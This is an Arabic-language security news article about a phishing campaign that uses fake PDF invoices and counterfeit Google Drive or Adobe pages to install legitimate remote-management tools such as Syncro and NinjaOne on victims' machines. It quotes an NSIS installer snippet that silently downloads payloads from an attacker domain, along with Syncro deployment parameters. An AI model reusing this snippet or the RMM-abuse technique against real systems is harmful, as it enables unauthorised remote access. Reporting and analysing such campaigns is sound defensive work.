تعرض مستخدمون لموجة جديدة من الهجمات السيبرانية تستهدفهم عبر ملفات PDF معدلة، بهدف تثبيت أدوات المراقبة والإدارة عن بعد (RMM) على أجهزتهم. تستغل هذه الهجمات الثقة العالية بأدوات RMM الشرعية لتسهيل الوصول غير المصرح به إلى الأنظمة.
تنتشر هذه الملفات الخبيثة، التي تحمل أسماء مثل “فاتورة” أو “طلب منتج”، غالبًا عبر حملات التصيد الاحتيالي الموجهة للشركات والأفراد. تبدو الملفات وكأنها مستندات عادية، مما يزيد من احتمالية فتحها من قبل المستخدمين.
استغلال أدوات RMM في الهجمات السيبرانية
تبدأ آلية الهجوم بعرض ملفات PDF تبدو سليمة، ولكن عند فتحها، يواجه المستخدم إما صورة عالية الجودة تمنع المعاينة أو رسالة خطأ تشير إلى فشل تحميل المستند. في كلتا الحالتين، يتم توجيه الضحية للنقر على رابط.
يقود هذا الرابط إلى صفحات تشبه صفحات Google Drive أو مواقع وهمية تدعي أنها Adobe. الهدف هو إرباك المستخدم وجعله يعتقد أنه يتعامل مع خدمة تخزين سحابي أو برنامج تحديث شرعي.
على سبيل المثال، قد تعرض صفحة Google Drive المزيفة ملفًا باسم “Video_recorded_on_iPhone17.mp4″، لكنه في الواقع مثبت لأداة RMM. يتم الاحتفاظ بهذا الاسم المضلل، بالإضافة إلى عبارة “Drive.google.com”، لزيادة التضليل.
تشير الأبحاث إلى أن هذه الحملة نشطة منذ أكتوبر 2025، حيث تم اكتشاف شهادات رقمية صالحة موقعة للمثبتات الخبيثة. هذا التكتيك يسمح للمهاجمين بتجاوز الدفاعات الأمنية التقليدية.
آلية التثبيت الخبيثة
تستغل الهجمات طبيعة أدوات RMM، التي تستخدم لأغراض إدارية مشروعة، مما يجعلها غير مصنفة تلقائيًا كبرامج ضارة تقليدية مثل برامج التجسس أو أبواب الدخول الخلفية. هذا يخلق فجوة أمنية يستغلها المهاجمون.
عندما يقوم المستخدم بتنزيل ما يعتقد أنه ملف فيديو، فإنه يقوم بتنزيل ملف تنفيذي تم إنشاؤه باستخدام أدوات مثل Advanced Installer أو NSIS. يقوم هذا الملف بتثبيت أداة RMM على النظام المستهدف.
في حالة استخدام Syncro RMM، يتم تمرير معلمات محددة أثناء التنفيذ، مثل “key” بقيمة “yK0UAOaHHwdbYDOp_sr51w” و “customerid” بقيمة “1709830”. هذه التفاصيل تسمح للمهاجم بالتحكم عن بعد في الأجهزة المصابة.
تتضمن النسخة التي تستخدم NSIS نصوصًا برمجية مدمجة تقوم بجلب حمولات إضافية من خوادم يتحكم بها المهاجم. يتم تنفيذ أوامر مثل:
StrCpy $0 $TEMPtemp_response.html
INetC::get/silent https://anhemvn124.com $0يقوم هذا الأمر بتنزيل الملفات بشكل صامت من نطاق خبيث، مما يمهد الطريق لمزيد من الاختراق. ثم يقوم المثبت بنشر NinjaOne RMM باستخدام Windows Installer في وضع التنفيذ الهادئ لتجنب اكتشاف المستخدم.
يسمح هذا الأسلوب للمهاجمين بتجاوز الإجراءات الأمنية المعتادة، حيث أن أدوات RMM مصممة للإدارة عن بعد المشروعة. غالبًا ما تتجاهل جدران الحماية وبرامج مكافحة الفيروسات هذه الأدوات، معتقدة أنها ليست تهديدًا.
هذا يخلق نقطة ضعف خطيرة يستفيد منها المهاجمون بشكل نشط لإنشاء وصول عن بعد مستمر إلى الأنظمة المخترقة، مما يهدد سلامة البيانات وسرية المعلومات.